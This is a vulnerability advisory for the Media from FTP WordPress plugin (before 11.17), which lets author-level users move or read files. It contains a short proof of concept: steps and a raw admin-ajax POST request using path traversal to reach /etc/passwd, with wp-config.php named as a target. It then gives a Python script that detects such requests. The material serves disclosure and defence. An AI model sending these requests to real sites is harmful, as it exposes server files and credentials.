wpexploit
Dmitrii Ignatyev
WPEX-ID:0D323B07-C6E7-4ABA-85BC-64659AD0C85D
History
Aug 14, 2023 - 12:00 a.m.

Media from FTP < 11.17 - Author+ Arbitrary File Access

ftp server
arbitrary file access
exploit
security vulnerability
wordpress plugin

AI Score

8.7

Confidence

High

EPSS

0.001

Percentile

37.1%

Description

The plugin does not properly limit who can use it, which may allow users with author+ privileges to move files around, such as wp-config.php, which may lead to RCE in some cases. In 11.16 the manage_options capability was used; however, this is still insufficient on Multisite setups.

1) Go to /wp-admin/admin.php?page=mediafromftp-search-register
2) Select any file from the media text list below
3) Click "Update Media"
4) Intercept request with action=mediafromftp-update-ajax-action
5) Change "new_url" by adding the following to the file path: /../../../../../../../../../../etc/passwd

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36
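
A detection check for the request above, added here as an example and not part of the original advisory or the plugin's code: it scans form bodies captured at a WAF or reverse proxy for this AJAX action and flags any new_url that resolves outside the uploads directory or carries a traversal segment. The /wp-content/uploads base path and every sample body except the first are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import parse_qs, unquote

ACTION = "mediafromftp-update-ajax-action"  # AJAX action from the request above
UPLOADS_BASE = "/wp-content/uploads"        # assumption: legitimate new_url values live here

def decode(value):
    """Undo nested percent-encoding (e.g. %252e%252e) and unify separators."""
    for _ in range(3):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value.replace("\\", "/")

def check_body(body):
    """Return a reason string if a form body moves a file out of uploads, else None."""
    form = parse_qs(body, keep_blank_values=True)
    if ACTION not in form.get("action", []):
        return None
    for raw in form.get("new_url", []):
        path = decode(raw)
        # normpath collapses ./ and ../ and clamps at the root for absolute paths
        resolved = posixpath.normpath("/" + path.lstrip("/"))
        if not (resolved + "/").startswith(UPLOADS_BASE + "/"):
            return "outside-uploads:" + resolved
        if ".." in path.split("/"):
            return "traversal-segment:" + resolved
    return None

# Constructed sample bodies; the first is the request body shown on this page.
SAMPLES = [
    "action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1"
    "&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36",
    "action=mediafromftp-update-ajax-action&new_url=/wp-content/uploads/2023/07/photo.jpg",
    "action=mediafromftp-update-ajax-action"
    "&new_url=/wp-content/uploads/%252e%252e/%252e%252e/wp-config.php",
    "action=mediafromftp-update-ajax-action&new_url=/wp-content/uploads/2023/../2022/a.jpg",
    "action=heartbeat&new_url=/etc/passwd",
]

def scan(bodies):
    """Return (index, reason) for every body that should raise an alert."""
    return [(i, r) for i, b in enumerate(bodies) if (r := check_body(b))]

if __name__ == "__main__":
    for index, reason in scan(SAMPLES):
        print(index, reason)
```

Requests from accounts below administrator level that hit this action at all are worth reviewing on versions before 11.17, since the description states that author+ users could reach it.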
